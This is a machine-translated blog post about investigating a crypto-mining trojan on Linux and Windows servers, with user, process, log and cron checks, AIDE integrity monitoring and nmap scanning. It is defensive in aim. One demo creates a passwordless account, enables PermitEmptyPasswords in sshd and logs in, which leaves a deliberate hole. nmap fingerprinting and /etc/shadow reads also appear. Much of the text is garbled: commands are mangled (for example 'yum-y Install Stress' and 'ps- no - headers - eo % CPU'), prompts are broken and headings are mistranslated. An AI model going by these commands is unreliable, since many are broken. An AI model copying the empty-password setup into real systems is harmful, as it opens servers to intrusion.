Writing in the front


  • Before going to school in Ali Cloud rented a student server, installed a Docker to play, later do not know what happened, through Docker client exposed port

  • Was implanted in foreign mining Trojan, only deployed a graduation project, CPU every day full, the machine was pulled to mining 🙁

  • They toss for a long time, the process can not kill, delete files directly to the machine to hang, and then submit work order reset

  • Organize this blog post to make a brief note of this issue

  • The blog post covers

    • Encountered mining basic screening measures
    • Two simple defenses
  • Blog posts don’t cover specific examples, just provide some directions for finding problems

Too hard people can’t run far, really stick to the last people rely on not passion, but just the right love and investment.


Dig a Trojan

Mining Trojan is a Trojan that attackers use various methods to break into computers and exploit the computing power of the hacked computers to mine cryptocurrencies for profits without the owner’s knowledge. It can be either a script for automatic scanning and attack or integrated into a single executable file.

To stay in the server for a long time, the mining Trojan uses various security countermeasures, such as modifying the task plan, modifying the firewall configuration, and modifying the system dynamic link library. Serious use of these technologies may interrupt server services.

Is it being mined

  • Whether the CPU usage of the computer rises, whether the system is stuck, whether some services can not run normally and so on
  • Check the server performance through the server performance monitoring device
  • By viewing security detection device alarms, you can determine that the Trojan horse is connected to the address of the mining pool

General processing steps

  • When there is a suspicious process, find the user of the current host to confirm the process;
  • When it is identified as a mining process, trace back to the source, because generally attackers will carry out relevant Settings to ensure that when the mining process is attackedkillAfter that, it can start again. Through tracing investigation, it can find the relevant configuration, catch up with the attack path of the attackers, and carry out targeted defense and patches to prevent the attackers from using it again.
  • After tracing, block the address of the pool, clear the task plan, disable suspicious users, end abnormal processes, remove the mining Trojan horse, eliminate all viruses and reinforce the system.
  • Determine the mining time of the mining Trojan horse the creation time of the mining Trojan horse file and the creation time of the task plan, and view the address of the mining pool

Linux Operations

The system screen

Checking User Information

All User informationcat /etc/passwd

┌ ─ ─ [[email protected]] - [/ usr/bin] └ ─$cat/etc/passwd root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/sbin/nologin ........ oprofile:x:16:16:Special user account to be used by OProfile:/var/lib/oprofile:/sbin/nologin ┌ ─ ─ [[email protected]] - [/ usr/bin] └ ─ $Copy the code

User’s last login informationlastlog

Displays the last login information of all users in the system. The lastlog file is queried every time a user logs in. You can use the lastlog command to check the last login time of a specific user and format the contents of the last login log /var/log/lastlog. It displays the login name, port number (TTY), and last login time sorted by UID. If a user has Never logged in, lastlog displays **Never logged**. Caution Run this command as root.

┌ ─ ─ [[email protected]] - [~] └ ─$lastlogUsername Port From Latest root PTS /0 192.168.26.1 Thu Mar 3 16:47:46 +0800 2022 bin **Never loggedin**
daemon                                  **Never logged in** postfix **Never loggedin**
sshd                                    **Never logged in**
chrony                                  **Never logged in**
tom                                     **Never logged in**
nginx                                   **Never logged in**
etcd                                    **Never logged in**
apache                                  **Never logged in**
pcp                                     **Never logged in**
mysql                                   **Never logged in**
oprofile                                **Never logged in* * ┌ ─ ─ [[email protected]] - [~] └ ─ $Copy the code

User error login listlastb

The Linux lastb command is used to list the information about users who failed to log in to the system. Lastb alone reads a file named BTMP in the /var/log directory and displays the list of failed logins.

┌ ─ ─ [[email protected]] - [~] └ ─$lastbRoot SSH :notty 192.168.26.1 Thu Mar 3 16:50-16:50 (00:00) root SSH :notty 192.168.26.1 Thu Mar 3 16:50-16:50 (00:00) BTMP begins Thu Mar 3 16:50:54 2022 chrysene ─[[email protected]]-[~] ├ ─$Copy the code

User’s latest login informationlast;

The Linux last command is used to display the latest login information of a user.

┌ ─ ─ [[email protected]] - [~] └ ─$last-5 root root PTS /0 192.168.26.1 Thu Mar 3 16:47 Still loggedinRoot PTS /0 192.168.26.1 Thu Mar 3 09:43-16:45 (07:02) Root PTS /0 192.168.26.1 Wed Mar 2 16:07-23:06 (06:58) root PTS /0 192.168.26.1 Tue Mar 1 16:40-20:04 (03:23) Root PTS /1 192.168.26.1 Mon Feb 28 12:46-11:18 (22:31) WTMP begins Thu Oct 18 23:13:06 2018 chrysene ─[[email protected]]-[~] ├ ─$Copy the code

Empty order accountawk -F ':' 'length($2)==0 {print $1}' /etc/shadow

┌ ─ ─ [[email protected]] - [~] └ ─$awk -F ':' 'length($2)==0 {print $1}'The/etc/shadow ┌ ─ ─ [[email protected]] - [~] └ ─ $Copy the code
┌ ─ ─ [[email protected]] - [~] └ ─$useradd test┌ ─ ─ [[email protected]] - [~] └ ─$passwd -d test
Removing password for user test. Passwd: Success chrysene ─[[email protected]]-[~] ├ ─$awk -F ':' 'length($2)==0 {print $1}' /etc/shadow
test┌ ─ ─ [[email protected]] - [~] └ ─ $Copy the code

Empty command login restrictioncat /etc/ssh/sshd_config | grep PermitEmptyPasswords

┌ ─ ─ [[email protected]] - [~] └ ─$cat /etc/ssh/sshd_config | grep  PermitEmptyPasswords
#PermitEmptyPasswords no # Set PermitEmptyPasswords yes to allow empty password login┌ ─ ─ [[email protected]] - [~] └ ─$sed -i 's/#PermitEmptyPasswords no/PermitEmptyPasswords yes/g'The/etc/SSH/sshd_config ┌ ─ ─ [[email protected]] - [~] └ ─$systemctlRestart the SSHD ┌ ─ ─ [[email protected]] - [~] └ ─ $Copy the code
PS E:\docker> ssh test@192.168.26.55
Last login: Thu Mar  3 17:30:48 2022 from 192.168.26.1
[test@liruilongs ~]$uptime
 17:34:27 up 3 days, 23:33,  2 users,  load average: 0.17, 0.09, 0.07
[test@liruilongs ~]$
Copy the code

Check the process

Here, let’s find a pressure tool to simulate itCPU 100%

┌ ─ ─ [[email protected]] - [~] └ ─$yum-y Install Stress chrysene ─[[email protected]]-[~] ├ ─$nohupStress-c 1-T 100 & [1] 132748 chrysene ─[[email protected]]-[~] ├ ─$nohupIgnoring input and appending output to 'nohup.out'Copy the code

At the same time needlsoftool

┌ ─ ─ [[email protected]] - [/ usr/bin] └ ─$yum -y install lsof
Copy the code

System processesps aux

┌ ─ ─ [[email protected]] - [~] └ ─$ps- no - headers - eo % CPU, pid, the args | sort - k1 - n - r | head - 10 134004 stress - 99.6 - c 1-500 1.7 8079 t sidekiq 5.0.5 Gitlab - rails of 25 busy 0 and 1.4 843 / usr/bin/etcd - name = default - data - dir = / var/lib/etcd/default etcd - listen - the client - urls = http://192.168.26.55:2379, http://localhost:2379 1.2 8156 / opt/gitlab/embedded/bin/Prometheus -web.listen-address=localhost:9090 -storage.local.path=/var/opt/gitlab/prometheus/data -storage.local.chunk-encoding-version=2 -storage.local.target-heap-size=67827957 - config. The file = / var/opt/gitlab Prometheus/Prometheus. 1.2 8060 / opt/yml gitlab/embedded/bin/redis - server 127.0.0.1:0, 1.1 8091 /opt/gitlab/embedded/bin/ruby /opt/gitlab/embedded/bin/gitlab-mon web -c The/var/opt/gitlab/gitlab - monitor/gitlab - monitor. 0.6 8198 ruby/opt/yml gitlab/embedded/service/gitaly - ruby/bin/gitaly - ruby 490 / TMP/gitaly - ruby360216715 / socket. 1, 0.6 8196 ruby/opt/gitlab/embedded/service/gitaly - ruby/bin/gitaly ruby - 490 / TMP/gItaly -ruby360216715/socket.0 0.5 7467 Java -duser. home=/var/jenkins_home -Dhudson.security.csrf.GlobalCrumbIssuerConfiguration.DISABLE_CSRF_PROTECTION=true- Djenkins. Model. Jenkins. SlaveAgentPort = 50000 - jar/usr/share/Jenkins Jenkins. War 0.3 9 [rcu_sched] ┌ ─ ─ [[email protected]] - [~] └ ─ $Copy the code

Process, port, and corresponding PIDNetstat -antp or ss

┌ ─ ─ [[email protected]] - [~] └ ─$netstat-antp Active Internet connections (servers and established) Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program Name TCP 0 0 127.0.0.1:2379 0.0.0.0:* LISTEN 843/etcd TCP 0 0 192.168.26.55:2379 0.0.0.0:* LISTEN 843/etcd TCP 0 0 127.0.0.1:2380 0.0.0.0:* LISTEN 843/etcd TCP 0 0 192.168.26.55:2380 0.0.0.0:* LISTEN 843/etcd TCP 0 0 0.0.0.0:8080 0.0.0.0: * LISTEN/docker 7347 - proxy... tcp6 0 0 :::2376 :::* LISTEN 1521/dockerd tcp6 0 0 ::1:4330 :::* LISTEN 36013/pmlogger ┌ ─ ─ [[email protected]] - [~] └ ─ $Copy the code

CPU usageTop or ps

Top-18:18:25 Up 4 days, 17 min, 2 users, Load Average: 0.51, 0.62, 0.77 Tasks: 249 total, 2 running, 247 sleeping, 0 stopped, 0 zombie %Cpu(s): 52.5US, 0.2sy, 0.0Ni, 47.0id, 0.3wa, 0.0hi, 0.0Si, 0.0st KiB Mem: 2031912 total, 77056 free, 1712644 used, 242212 buff/cache KiB Swap: 10485756 total, 8991960 free, 1493796 Used.88756 Avail Mem PID USER PR NI VIRT RES SHR S %CPU % Mem TIME+ COMMAND 134004 root 20 0 7264 100 0 R 100.0 0.0 0:37.87 Stress 8079 chrony 20 0 889220 349276 1624s 1.3 17.2 98:16.80 bundle 843 ETCD 20 0 10.308g 5488 824s 1.0 0.3 83:53.19 etcd 8156 992 20 0 348680 56736 3920 S 1.0 2.8 71:08.16 Prometheus 7467 Tom 20 0 3109092 213956 764 S 0.7 Java 8060 nginx 20 0 41636 3676 888 S 0.7 0.2 75:50.13 Redis-server 8099 chrony 20 0 401332 16700 1964 S Gitaly 9 root 20 00 0 S 0.3 0.0 20:37.39 rcu_sched 8196 chrony 20 0 1314608 36 0 S 0.3 0.0 34:57.02 Ruby 121037 root 20 00 00 SSHD 132973 root 20 00 0 S 0.3 0.0 0:00.21 Root 20 0 162032 2360 1556 R 0.3 0.1 0:00.05 top........ 15 root 0-20 00 0 S 0.0 0.0 0:00.00 kworker/ 1:00 HCopy the code

Take a closer look at the suspect processlsof -p PID

┌ ─ ─ [[email protected]] - [~] └ ─$lsof-p 134004 COMMAND PID USER FD TYPE DEVICE SIZE/OFF NODE NAME stress 134004 root CWD DIR 8,1 4096 134217793 /root stress 134004 root RTD DIR 8 1 4096 64 /stress 134004 root TXT REG 8 1 27704 277828820 /usr/bin/stress stress 134004 root mem REG 8 1 2127336 402654082 /usr/lib64/libc-2.17.so stress 134004 root mem REG 8 1 1139680 402654090 /usr/lib64/libm-2.17.so stress 134004 root mem REG 8,1 164264 402654075 /usr/lib64/ld-2.17.so stress 134004 root 0w CHR 1,3 0t0 18 /dev/null stress 134004 root 1w REG 8,1 66 145012428 /root/nohup. Out stress 134004 root 2w REG 8,1 66 145012428 / root/nohup. Out ┌ ─ ─ [[email protected]] - [~] └ ─ $Copy the code

View suspicious process information in detailll /proc/PID

┌ ─ ─ [[email protected]] - [~] └ ─$ll/proc/134004 ls: cannot access /proc/134004: No such file or directory [1]+ Done nohup stress-c 1-T 500 chrysene ─[[email protected]]-[~] ├ ─$Copy the code

Look at the suspect port in detaillsof -i :port

┌ ─ ─ [[email protected]] - [~] └ ─$lsof-i COMMAND PID USER FD TYPE DEVICE SIZE/OFF NODE NAME chronyd 642 chrony 1u IPv4 21585 0t0 UDP localhost:323 chronyd 642  chrony 2u IPv6 21586 0t0 UDP localhost:323 etcd 843 etcd 5u IPv4 24201 0t0 TCP vms55.rhce.cc:2380 (LISTEN) etcd 843 etcd 6u IPv4 24209 0t0 TCP localhost:2380 (LISTEN) ........ pmcd 1011 pcp 3u IPv6 23985 0t0 TCP localhost:pmcd (LISTEN) master 1036 root 13u IPv4 24056 0t0 TCP localhost:smtp (LISTEN) ........ SSHD 121037 root 3U IPv4 3821579 0t0 TCP vMS55.rce. Cc: SSH ->192.168.26.1:13570 (ESTABLISHED) SSHD 127459 root 3U IPv4 3850818 0t0 TCP *:ssh (LISTEN) sshd 127459 root 4u IPv6 3850820 0t0 TCP *:ssh (LISTEN) sshd 128629 root 3u IPv4 3856418 0t0 TCP vMS55.rhce. Cc: SSH ->192.168.26.1:5928 (ESTABLISHED) SSHD 128631 liruilong 3U IPv4 3856418 0t0 TCP Vms55. Rhce. Cc: SSH - > 192.168.26.1:5928 (ESTABLISHED) ┌ ─ ─ [[email protected]] - [~] └ ─$lsof -i :7269
Copy the code

Log screen

View task plan logs:

Current Task Plancrontab -l

┌ ─ ─ [[email protected]] - [~] └ ─$crontab -l
no crontab forRoot ┌ ─ ─ [[email protected]] - [~] └ ─ $Copy the code

etcDirectory Task plan related filesls /etc/cron*

┌ ─ ─ [[email protected]] - [~] └ ─$ls/etc/cron* /etc/cron.deny /etc/crontab /etc/cron.d: 0hourly sysstat /etc/cron.daily: logrotate man-db.cron /etc/cron.hourly: 0anacron /etc/cron.monthly: /etc/cron.weekly: ┌ ─ ─ [[email protected]] - [~] └ ─ $Copy the code

View task plan logscat /var/log/cron

┌ ─ ─ [[email protected]] - [~] └ ─$cat /var/log/cron | head -3
Feb 27 03:43:13 liruilongs run-parts(/etc/cron.daily)[65785]: finished man-db.cron
Feb 27 03:43:13 liruilongs anacron[59178]: Job cron.daily' ' terminated
Feb 27 03:43:13 liruilongs anacron[59178]: Normal exit1 job (run) ┌ ─ ─ [[email protected]] - [~] └ ─ $Copy the code

View related log filesls /var/spool/mail

┌ ─ ─ [[email protected]] - [~] └ ─$ls /var/spool/mail/
liruilong  testTom ┌ ─ ─ [[email protected]] - [~] └ ─ $Copy the code

To view the startup logs:

View the overall system information.cat /var/log/message

┌ ─ ─ [[email protected]] - [~] └ ─$cat /var/log/messages | head -3 Feb 27 03:50:01 liruilongs systemd: Started Session 157 of user root. Feb 27 03:55:18 liruilongs systemd: Starting Check pmlogger instances are running... Feb 27 03:55:21 Liruilongs Systemd: Started Check PMlogger instances are running. Chrysene ─[[email protected]]-[~] ├ ─$Copy the code

View authentication and authorization information,cat /var/log/secure

┌ ─ ─ [[email protected]] - [~] └ ─$cat /var/log/secure | head -5
Feb 27 11:17:41 liruilongs sshd[110566]: pam_unix(sshd:session): session closed for user root
Feb 27 17:38:04 liruilongs sshd[148418]: Accepted password forRoot from 192.168.26.1 port 11561 SSH2 Feb 27 17:38:04 liruilongs SSHD [148418]: pam_UNIX (SSHD :session): Session Openedfor user root by (uid=0)
Feb 28 10:05:52 liruilongs sshd[148418]: pam_unix(sshd:session): session closed for user root
Feb 28 12:12:37 liruilongs sshd[94739]: Accepted password forRoot from 192.168.26.1 port 13775 ssh2chrysene ─[[email protected]]-[~] ├ ─$Copy the code

View the information about all users who accessed the system last time:cat /var/log/lastlog

View all failed login information:cat /var/log/btmp

View logs about the running email server:cat /var/log/maillog

Check out the shell commands you’ve used before:cat ~/.bash_history

The above is a conventional investigation method, but hackers generally erase their traces of operation, and may find nothing in the end. Remember to kill the mining process in time, and then explore his next attack.

Simple prevention measures

AIDE Intrusion Detection

The Advanced Intrusion Detection Environment (AIDE) software is an intrusion detection system

The aide principle

  • Do a thorough check of our computer before it is tampered with
  • Record the state of each file (including data time, size, permissions, hash values, etc.)
  • When a computer is hacked, AIDE performs the same checks, the same checks on the computer
  • Finally, find out which data has changed which by comparing the results checked before the intrusion with the results checked after the intrusion
┌ ─ ─ [[email protected]] - [~] └ ─$yum -y install aide
Copy the code

Configuration file Information

┌ ─ ─ [[email protected]] - [~] └ ─$vim /etc/aide.conf
1 # Example configuration file for AIDE.
2
3 @@define DBDIR /var/lib/aide # where to store the result file after data is verified in AIDE
4 @@define LOGDIR /var/log/aide The directory where the aide log files are stored.When the system is invaded, rename the data aid.db.new. gz to aid.db.gz
After the system is hacked, the newly generated verification result aid.db.new. gz will be compared with the previous verification result aid.db. gz
7 database=file:@@{DBDIR}/aide.db.gz
......
##### Defines the directory and file in which to save the verification result after data verification
/var/lib/aide Ask aide.db.new.gz for the file name to save
12 database_out=file:@@{DBDIR}/aide.db.new.gz
......
28 Check whether the permissions of the file have been changed
29 # I: inode: # Check whether the inode node of the file is modified
30 #n: number of links #n: number of links #n: number of links
31 #u: user # Verify whether the owner of the file has been changed
32 #g: group # The group to which the verification file belongs Is changed
33 #s: size # Check whether the file size changes. 42#md5: md5 checksum # Check the md5 generated hash value of the file
43 #sha1: sha1 checksum # Check the hash value generated by sha1
44 #sha256: sha256 checksum # Check the hash value generated by sha256.###### defines variables that contain all of the above validations
54 FIPSR = p+i+n+u+g+s+m+c+acl+selinux+xattrs+sha256
......
71 NORMAL = sha256 # define variable, verify hash value, will be called

Copy the code

Directory Settings for validation

┌ ─ ─ [[email protected]] - [~] └ ─$vim /etc/aide.conf
.........
# Extended content + file type + access.
CONTENT_EX = sha256+ftype+p+u+g+n+acl+selinux+xattrs

# Some files get updated automatically, so the inode/ctime/mtime change
# but we want to know when the data inside them changes.
DATAONLY =  p+n+u+g+s+acl+selinux+xattrs+sha256

# Next decide what directories/files you want in the database. Aide
# uses a first match system. Put file specific instructions before generic
# matches. e.g. Put file matches before directories.

/boot/   CONTENT_EX  Sha256 +ftype+p+u+g+n+acl+selinux+xattrs
/bin/    CONTENT_EX
/sbin/   CONTENT_EX
/lib/    CONTENT_EX
/lib64/  CONTENT_EX
/opt/    CONTENT

# Admin's dot files constantly change, just check perms./root/\.. * PERMS# Otherwise get all of /root.
/root/   CONTENT_EX

# These are too volatile.! /usr/src/#! Set the directory that does not need verification! /usr/tmp/# Otherwise get all of /usr.
/usr/    CONTENT_EX

Copy the code

Here is a simple test, modify the configuration file, only verify files in the TMP directory

DATAONLY =  p+n+u+g+s+acl+selinux+xattrs+sha256
........
/tmp/ DATAONLY
#/boot/ CONTENT_EX
#/bin/ CONTENT_EX
#/sbin/ CONTENT_EX
#/lib/ CONTENT_EX
#/lib64/ CONTENT_EX
#/opt/ CONTENT.Copy the code

Initialization check

Initialization check: Verifies data based on the configuration file before being attacked

┌ ─ ─ [[email protected]] - [~] └ ─$aide --init

AIDE, version 0.15.1
### AIDE database at /var/lib/aide/aide.db.new.gz initialized.┌ ─ ─ [[email protected]] - [~] └ ─ $Copy the code

Check the generated check result data. # AIDE generates the same file name for each check

┌ ─ ─ [[email protected]] - [~] └ ─$ll/var/lib/aide/aide.db.new.gz -rw------- 1 root root 39758 Mar 3 19:04 /var/lib/aide/aide.db.new.gz ┌ ─ ─ [[email protected]] - [~] └ ─ $Copy the code

Back up database files to a secure location such as usb flash drive, CD-ROM, portable hard disk, network storage before being invaded

┌ ─ ─ [[email protected]] - [~] └ ─$mvThe/var/lib/aide/aide. Db. New. Gz/MNT / ┌ ─ ─ [[email protected]] - [~] └ ─ $Copy the code

The invasion of check

Copy the backup verification database file to /var/lib/aide

┌ ─ ─ [[email protected]] - [~] └ ─$cp /mnt/aide.db.new.gz /var/lib/aide/aide.db.gz
Copy the code

The newly generated database file is defined in the configuration fileaide.db.gzWe need to change the name.

┌ ─ ─ [[email protected]] - [~] └ ─$aide- check the AIDE, version 0.15.1### All files match AIDE database. Looks okay!┌ ─ ─ [[email protected]] - [~] └ ─ $Copy the code

No changes are detected until the file is modified

┌ ─ ─ [[email protected]] - [~] └ ─$echo aide test >> /tmp/test.txt
Copy the code

right/tmpModify and reuse the files in the directoryaideCheck and compare

┌ ─ ─ [[email protected]] - [~] └ ─$aide-- Check AIDE 0.15.1 found differences between database and filesystem!! Start timestamp: 2022-03-03 19:10:51 Summary: Total number of files: 2712 Added files: 1 Removed files: 0 Changed files: 0 --------------------------------------------------- Added files: -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- - added: / TMP/test. TXT ┌ ─ ─ [[email protected]] - [~] └ ─ $Copy the code

NMAP scan

NMAP is a powerful network detection tool that supports a variety of detection techniques :ping scan, multi-port scan, TCP/IP fingerprint verification

Nmap [scan type] [options] < Scan target… >

Common scan types

  • -SS, TCP SYN scan (half open)
  • -st, TCP connection scanning (fully open)
  • -sU indicates UDP scanning
  • -sP indicates ICMP scanning
  • -a, full target system analysis

TCP SYN scan (fully open):

In the left figure, to check whether port 80 of the target host is open, host A sends A SYN request to port 80 of the target host for establishing A connection during scanning. The target host responds with syn and ACK. Host A also responds with an ACK, indicating that the connection is established and port 80 of the target host is open.

TCP SYN scan (half-open):

Right: To check whether port 80 of the target host is open, host A sends A SYN request to port 80 of the target host to establish A connection during scanning. The target host replies with syn and ACK, indicating that port 80 of the target host is open. Host A does not respond with ACK, saving resources for an ACK response. Because there is no need to establish a connection, as long as the target host responds, when scanning more hosts, more system resources will be saved.

Example of NMAP application

Here the scanning machine is a Linux subsystem in the local Windows, and the scanned machine is a Linux virtual machine on Windows

Check the survival status of the target hostpingTong)

┌ ─ ─ (root 💀 Liruilong) - / MNT/e/docker └ ─# nmap-n-sp 192.168.26.0/24Starting Nmap 7.91 (https://nmap.org) at 2022-03-03 19:28 CST Nmap Scan Reportfor192.168.26.55 Host is up (latency).# 192.168.26.55 survive
Nmap done: 256 IP addresses (1 host up) scanned in 10.61 seconds
Copy the code

Scanning HTTP Ports

┌ ─ ─ (root 💀 Liruilong) - / MNT/e/docker └ ─# nmap -n 192.168.26.55 -p 80Starting Nmap 7.91 (https://nmap.org) at 2022-03-03 19:31 CST Nmap Scan Reportfor192.168.26.55 Host is up (0.00089s latency). PORT STATE SERVICE 80/ TCP open HTTP# Open, service HTTP

Nmap done: 1 IP address (1 host up) scanned in 0.40 seconds

Copy the code

Scan to view the status of port 80 on all network segments 26.0

┌ ─ ─ (root 💀 Liruilong) - / MNT/e/docker └ ─# nmap -n 192.168.26.0/24 -p 80Starting Nmap 7.91 (https://nmap.org) at 2022-03-03 19:32 CST Nmap Scan Reportfor192.168.26.1 Host is up (0.00052s latency). PORT STATE SERVICE 80/ TCP filtered HTTP Nmap scan reportfor192.168.26.55 Host is up (latency). PORT STATE SERVICE 80/ TCP open HTTP Nmapdone: 256 IP addresses (2 hosts up) scanned in 18.83 seconds
Copy the code

Scan to check the status of TCP ports 53-55 and 25

─ ─ (root 💀 Liruilong) - / MNT/e/docker └ ─# nmap -n 192.168.26.55 -p 53-55,25Starting Nmap 7.91 (https://nmap.org) at 2022-03-03 19:37 CST Nmap Scan Reportfor192.168.26.55 Host is up (0.00098s latency). PORT STATE SERVICE 25/ TCP closed SMTP 53/ TCP closed domain 54/ TCP closed xns-ch 55/tcp closed isi-gl Nmapdone: 1 IP address (1 host up) scanned in 0.40 seconds

Copy the code

Compound scan: Checks the fingerprint and software version of the operating system

┌ ─ ─ (root 💀 Liruilong) - / MNT/e/docker └ ─# nmap -n -a 192.168.26.55Starting Nmap 7.91 (https://nmap.org) at 2022-03-03 19:27 CST Nmap Scan Reportfor 192.168.26.55
Host is up (0.00087s latency).
Not shown: 995 closed ports
PORT      STATE SERVICE VERSION
Port 22 is enabled on the target host using OpenSSH 7.422 / TCP open SSH OpenSSH protocol (7.4 2.0) | SSH - hostkey: | 2048 5b:40:0e:e6:1d:70:7f:f1:05:34:8d:2b:72:a1:c5:b3 (RSA) |_ 256 f1:27:ee:82:cc:94:b2:7c:68:c9:ea:a0:88:64:20:b3 (ECDSA)The target host is enabled on port 80, using the HTTP service and using the software nginx
80/tcp    open  http    nginx
| http-robots.txt: 53 disallowed entries (15 shown)
| / /autocomplete/users /search /api /admin /profile
| /dashboard /projects/new /groups/new /groups/*/edit /users /help| _ / s / / snippets/new/snippets / * / 222 / edit TCP open SSH OpenSSH p2 Ubuntu 7.2 4 ubuntu2. 4 (Ubuntu Linux. Protocol 2.0) | SSH - hostkey: | _ 256 03: b8:32:59: AD: e7:9 c: sons of 3:5 c: 04:7 a: scepter 8:9 3: cb (ED25519) 8080 / TCP open HTTP Jetty 9.4.43. V20210629 | _http - the title:  Site doesn' 't have a title (text/html; charset=utf-8).# The target host is enabled on port 50000, using the HTTP service and using the Jenkins softwareJenkins, 50000 / TCP open HTTP 2.319 | HTTPD _http - title: Site doesn't have a title (text/plain; charset=UTF-8). No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ). TCP/IP fingerprint: OS: SCAN (V = 7.91% E = 3 D = 4% / 3% OT = 22% CT = 1% CU = 36908% PV = Y % DS = 2% DC = G = Y T % % a6be TM = 6220 OS:%P=x86_64-pc-linux-gnu)SEQ(SP=102%GCD=1%ISR=10C%TI=Z%CI=I%II=I%TS=A)SEQ( OS:SP=102%GCD=1%ISR=10C%TI=Z%TS=A)SEQ(SP=102%GCD=1%ISR=10C%TI=Z%CI=I%TS=A)O OS:PS(O1=M5B4ST11NW7%O2=M5B4ST11NW7%O3=M5B4NNT11NW7%O4=M5B4ST11NW7%O5=M5B4S OS:T11NW7%O6=M5B4ST11)WIN(W1=7120%W2=7120%W3=7120%W4=7120%W5=7120%W6=7120)E OS:CN(R=Y%DF=Y%T=40%W=7210%O=M5B4NNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F OS:=AS%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5 OS:(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z OS:%F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF= OS:N%T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=8E44%RUD=G)IE(R=Y%DFI=N%T= OS:40%CD=S) Network Distance: 2 hops Service Info: OS: Linux; CPE: Cpe :/ O: Linux :linux_kernel TRACEROUTE (using port 6002/ TCP) HOP RTT ADDRESS 1 0.32 ms 172.24.208.1 2 0.77 ms The OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/. Nmap done: 1 IP address (1 host up) Scanned in 171.45 secondsCopy the code

Windows Operating System

The system screen

Check user information and use instructionsnet usersOr,Computer management—>Local user and groupTo find clone users through the registry

D: \ > net users \ \ LIRUILONG user account -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- The __HSKDDNS_USER__ Administrator DefaultAccount Guest Lenovo WDAGUtilityAccount command completes successfully.Copy the code

Network connection check,netstat -ano, check for suspicious network connections

D:\>netstat -ano Active Connection Protocol Local ADDRESS External address STATUS PID TCP 0.0.0.0:135 0.0.0.0:0 LISTENING 1116 TCP 0.0.0.0:443 0.0.0.0:0 LISTENING 8036 TCP 0.0.0.0:445 0.0.0.0:0 LISTENING 4....... TCP 192.168.1.5:2384 112.86.128.91:443 ESTABLISHED 14184 TCP 192.168.1.5:2386 112.86.128.91:443 ESTABLISHED 14184 TCP 192.168.1.5:2413 112.86.128.91:443 ESTABLISHED 14184 TCP 192.168.1.5:2415 112.86.128.91:443 ESTABLISHED 14184 TCP 192.168.1.5:2511 124.238.121.41:80 CLOSE_WAIT 11696 TCP 192.168.1.5:2513 113.96.237.36:443 192.168.1.5:2523 113.96.237.36.443 CLOSE_WAIT 11696 TCP 192.168.1.5:2524 113.96.237.36.443 CLOSE_WAIT 11696.......Copy the code

Process check,Task managerCheck for suspicious processes

Mission planning review,Task plannerCheck for suspicious task schedules

Service screening,Task manager—> service

Log screen

System Logs: By default, Windows system Logs are stored in %SystemRoot%\ system32\ Winevt\Logs.

  • Application.evtx(Application log),
  • Security.evtx(Security logs)
  • System.evtx (System logs)

You can use the system’s own event viewer to view the security logs

PS C:\Windows\System32\winevt\Logs> ls C:\Windows\System32\winevt\Logs Mode LastWriteTime Length Name ---- ------------- ------ ---- -a---- 2022/3/3 15:46 20975616 Application.evtx -a---- 2021/2/17 16:02 69632 HardwareEvents.evtx -a---- 2021/2/17 16:02 69632 Internet Explorer.evtx -a---- 2021/2/17 16:02 69632 Key Management Service.evtx -a---- 2022/2/25 21:42 1118208 Lenovo-Power-BaseModule%4Operational.evtx -a---- 2021/4/9 8:23 69632 Microsoft-AppV-Client%4Admin.evtx -a---- 2021/4/9 8:23 69632 Microsoft-AppV-Client%4Operational.evtx -a---- 2021/4/9 8:23 69632 Microsoft-AppV-Client%4Virtual Applications.evtx ............................Copy the code